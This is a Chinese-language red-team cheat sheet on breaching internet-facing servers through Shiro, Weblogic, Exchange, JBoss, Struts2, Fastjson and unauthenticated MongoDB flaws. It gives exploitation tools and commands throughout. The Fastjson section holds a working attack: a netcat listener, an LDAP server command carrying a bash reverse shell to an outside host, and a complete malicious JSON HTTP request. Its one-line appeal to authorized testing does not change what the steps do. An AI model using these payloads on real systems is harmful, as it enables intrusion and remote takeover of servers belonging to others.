红蓝对抗外网打点技巧总结
字数 1173 2025-08-11 17:40:10
红蓝对抗外网打点技巧总结
1. Shiro反序列化漏洞利用
检测方法
-
常规检测:
- 通过登录框、页面或Wappalyzer确定目标使用Java语言
- 使用shiro_tool.jar检测是否为Shiro框架:
java -jar shiro_tool.jar https://xxx.com/xx/ keys=/xxx/shiro_keys.txt
-
BurpSuite被动扫描:
- 使用BurpShiroPassiveScan插件进行被动扫描
- GitHub地址:https://github.com/pmiaowu/BurpShiroPassiveScan
利用方法
- 使用大量key字典跑出正确的key
- 使用ShiroExploit-v2.3.jar执行命令或写入内存马
注意事项
- 登录框可能不存在,但跳转后的POST接口可能存在认证
- 建议尝试登录后抓包分析
2. Weblogic反序列化漏洞
常见端口
- 7001
- 7002
利用工具
- WeblogicScan:
- https://github.com/rabbitmask/WeblogicScan
- weblogicScanner:
- https://github.com/0xn0ne/weblogicScanner
- 图形化工具:
- weblogic_exploit-1.0-SNAPSHOT-all.jar
3. Exchange RCE漏洞
利用工具
- Exchange SSRF RCE工具:
- https://github.com/jeningogo/exchange-ssrf-rce
4. MongoDB未授权访问
检测工具
- DBScanner:
- https://github.com/se55i0n/DBScanner
- 可扫描多种数据库的未授权访问漏洞
5. JBoss RCE漏洞
参考资源
- Java反序列化漏洞利用:
- https://github.com/joaomatosf/JavaDeserH2HC
JBoss 5.x/6.x反序列化漏洞(CVE-2017-12149)
- 检测方法:
- 访问
/invoker/readonly - 返回500说明页面存在,存在反序列化漏洞
- 访问
6. Struct2漏洞
利用工具
- STS2G:
- https://github.com/x51/STS2G
7. Fastjson反序列化漏洞
利用工具
- fastjson_rce_tool:
- https://github.com/wyzxxz/fastjson_rce_tool
利用方法
-
启动LDAP服务器:
nc -lvp 4444 java -cp fastjson_tool.jar fastjson.HLDAPServer your_vps_ip port "bash=/bin/bash -i >& /dev/tcp/your_vps_ip/4444 0>&1" -
发送恶意请求:
POST / HTTP/1.1 Host: 192.168.255.132:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 193 { "e":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "f":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://192.168.255.135:8888/Object", "autoCommit":true } }
总结
本文档总结了红蓝对抗中常见漏洞的检测和利用方法,包括:
- Shiro反序列化
- Weblogic反序列化
- Exchange RCE
- MongoDB未授权访问
- JBoss RCE
- Struct2漏洞
- Fastjson反序列化
每个漏洞都提供了相应的检测工具和利用方法,实际使用时请确保在合法授权范围内进行测试。